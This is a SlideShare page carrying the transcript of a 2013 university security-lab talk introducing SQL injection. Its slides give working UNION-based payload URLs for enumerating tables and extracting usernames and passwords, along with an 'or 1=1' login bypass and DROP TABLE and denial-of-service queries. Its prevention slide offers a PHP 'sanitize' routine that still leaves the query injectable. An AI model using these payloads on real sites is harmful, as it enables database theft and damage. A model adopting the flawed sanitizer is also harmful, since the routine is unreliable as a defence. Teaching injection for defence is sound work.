A Brief Introduction in SQL Injection
Upcoming SlideShare
Loading in...5
×
 

A Brief Introduction in SQL Injection

on

  • 1,417 views

 

Statistics

Views

Total Views
1,417
Slideshare-icon Views on SlideShare
1,417
Embed Views
0

Actions

Likes
0
Downloads
6
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • Tables have relation with each other . Inserting the row in tables with unauthorized access

A Brief Introduction in SQL Injection A Brief Introduction in SQL Injection Presentation Transcript

  • Security Lab, University Putra Malaysia23 May 2013Sina ManaviContact:http://sinamanavi.blogspot.com/p/about-me.html
  • • Introduction• Why SQL Injection• What is needed for this• What you can do with SQL Injection• What are its pros and cons• Why we need to know and how we can prevent ourdatabase from SQL injection attacks
  • We are all familiar with SQL LanguageOne of the technology that helped in converting the staticweb to dynamic oneSQL is relatively easy to read, a little more difficult to writeWorks on Servers such as Apache, MS Server, etc.SQL Injection means manipulate SQL tables withunauthorized access
  •  SQL Injection may happen only two form of UIbased or URL based◦ (1) Injecting into a form. Such as username andpassword boxes on a login page.◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php?pid=10
  •  Simple example: Select ID from tbl_users◦ Where ID=“Uid” and pass=“pass”◦ If it returns any value means that the current inputs are correct
  •  www.yourtarget.com/list?id=5 if you want to view a record from a table by theURL based injection:Select * from tbl_usersWhere id=5
  •  The "INFORMATION_SCHEMA" holds the namesof every table and column on a site, its name willnever change.◦ Tables holding all the tables name: "INFORMATION_SCHEMA.TABLES.“◦ Tables holding all the Column name: "INFORMATION_SCHEMA.COLUMNS.“
  •  Finding the URL quantity:◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1--Increase the 1 , until you got error, then the last number is the columnnumber Finding Table name◦ www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--And it shows:tbl_userTo Be continued 
  •  Now its time to find out the Column names:www.yourtarget.com/list.php? ID =-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=‘tbl_user-- The result would be as following :id,username,passwordColumn names finding step:www.yourtarget.com/list.php? ID =-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=UserAccounts+AND+column_name>displayed_column—Try the columns name until you find your target (e.g username,password, or login)
  •  And Finally its time to see the records:◦ www.yourtarget.com/list.php? =-1+UNION+SELECT+1,username,3+FROM+UserAccounts— And◦ www.yourtarget.com/list.php? =-1+UNION+SELECT+1,password,3+FROM+UserAccounts—◦ Username=admin password=123456◦ Stupid admin ha ;) 
  •  Now we can Alter the records as well, lets rockUPDATE tbl_userSET password = SHA2($password)WHERE id = $idOr we can Insert a new user with Insert Command
  • If user_list contains 1000 records then, the database isfired up SELECT * FROM user_list JOIN user_listJOIN user_list JOIN user_list JOIN user_listJOIN user_list
  • Insert newuser into tbl_userThe maliciouse code can be :DROP table tbl_user
  •  How it worksSelect * from tbl_usersWhere id=“Fname” and pass=“pass” Malicious Code:SELECT * FROM table WHERE id= ‘Fname or 1=1;if(mysql_num_rows($result))//do loginNow the unauthorized user get accessed easily andbypassed the authorization
  •  Security is the developer’s job No database, connector, or frameworkcan prevent SQL injection all the time
  • • Implement proper Error Handling. This would includeusing a single error message for all errors.• Lock down User Database configuration, Specify users,roles and permissions etc.• prefix and append a quote to all user input, even if thedata is numeric .
  • <?phpfunction sanitize($string){$string = strip_tags($string);$string = htmlspecialchars($string);$string = trim(rtrim(ltrim($string)));$string = mysql_real_escape_string($string);return $string;}$password = sanitize( $_POST["password"] );mysql_query("UPDATE UsersSET password = $passwordWHERE user_id = $user_id");
  • Vipin Samar, Oracle vice president of DatabaseSecurity:“Database Firewall is a good first layer ofdefense for databases but it wont protect you fromeverything,”
  •  Using Stroprocedures:CREATE PROCEDURE SP_show_user(IN U_ID)BEGINSELECT * FROM Bugs WHERE User_ID= U_ID;ENDCALL SP_show_user (54)“Might be helpful but still vulnerable”
  •  I don’t have to worry anymore Escaping is the fixthe fix More escaping is better I can code an escaping function Only user input is unsafe Stored procs are the fixthe fix SQL privileges are the fixthe fix My app doesn’t need security Frameworks are the fixthe fix Parameters quote for you Parameters are the fixthe fix Parameters make queries slow SQL proxies are the fixthe fix NoSQL databases are the fixthe fix
  • NoSQL databases are immune to SQL injection.